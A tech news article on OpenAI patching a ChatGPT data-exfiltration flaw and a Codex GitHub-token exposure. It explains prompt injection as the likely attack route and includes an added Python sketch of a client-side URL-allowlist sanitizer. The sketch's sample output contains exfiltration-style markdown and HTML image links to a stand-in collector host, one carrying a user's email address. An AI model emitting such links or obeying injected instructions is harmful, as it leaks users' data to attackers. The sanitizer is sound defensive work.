OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
OpenAI has patched two security vulnerabilities affecting its products: a data exfiltration flaw in ChatGPT and a separate vulnerability in Codex that exposed GitHub authentication tokens, according to a report by The Hacker News.
The ChatGPT data exfiltration vulnerability would have allowed an attacker to craft inputs that caused the model to leak user data or conversation contents to an external destination. Data exfiltration vulnerabilities in AI chat interfaces typically exploit the model's ability to make requests or render content by injecting malicious instructions through user-supplied or third-party content, a class of attack known as prompt injection.
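The rendering path described above has a standard client-side mitigation: refuse to load or link anything in model output whose host is not explicitly trusted. The sketch below is an added example, not OpenAI's fix and not code from the report, which does not describe the flaw's mechanism; `ALLOWED_HOSTS`, the function names and the sample hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption (not from the article): the only host the client may load from.
ALLOWED_HOSTS = {"cdn.example.com"}
# Inline markdown image or link: ![alt](url "title") or [text](url)
INLINE = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
# Raw HTML tag carrying a src= or href= attribute
HTML_TAG = re.compile(r'<[^>]*?\b(?:src|href)\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.I)

def url_allowed(url):
    """True only for https URLs whose parsed host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    # .hostname drops userinfo and port, so "trusted@other-host" checks other-host.
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS

def sanitize_model_output(text):
    """Return (safe_text, blocked_urls) for model output about to be rendered."""
    blocked = []

    def inline(m):
        bang, label, url = m.groups()
        if url_allowed(url):
            return m.group(0)
        blocked.append(url)
        # An image is fetched automatically on render; a link keeps only its text.
        return "[image removed]" if bang else label

    def html(m):
        if url_allowed(m.group(1)):
            return m.group(0)
        blocked.append(m.group(1))
        return "[html removed]"

    text = HTML_TAG.sub(html, INLINE.sub(inline, text))
    return text, blocked

# Constructed sample: model output after processing injected third-party content.
SAMPLE = (
    "Summary done. ![s](https://collector.invalid/p?d=alice%40example.com) "
    "See [docs](https://cdn.example.com/guide) and "
    "[more](https://cdn.example.com@collector.invalid/x). "
    '<img src="https://collector.invalid/a.png">'
)
if __name__ == "__main__":
    print(sanitize_model_output(SAMPLE))
```

The list of blocked URLs is worth logging: a non-allowlisted image URL carrying query data in model output is a useful detection signal for injected content.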
The Codex vulnerability involved GitHub access tokens, which are used by developers to authenticate to GitHub's API for operations including reading and writing code repositories. A compromised token could give an attacker access to the private code repositories and organizational resources of affected developers, with the scope depending on the permissions granted to the exposed token.
OpenAI did not disclose the researchers who identified the vulnerabilities or whether either flaw had been exploited in the wild before the patches were applied. The company has a public vulnerability disclosure policy and a bug bounty program.
The disclosures add to a growing body of security research focused specifically on AI systems as attack surfaces. Researchers have identified prompt injection, training data extraction, and model inversion as distinct vulnerability classes that do not map cleanly to traditional software security frameworks.
Codex is OpenAI's code-generation model, available via API and embedded within GitHub Copilot. Its integration with developer workflows and source code repositories makes credential exposure through Codex particularly consequential.
Sources
Published by Tech & Business, a media brand covering technology and business.
This story was sourced from The Hacker News and reviewed by the T&B editorial agent team.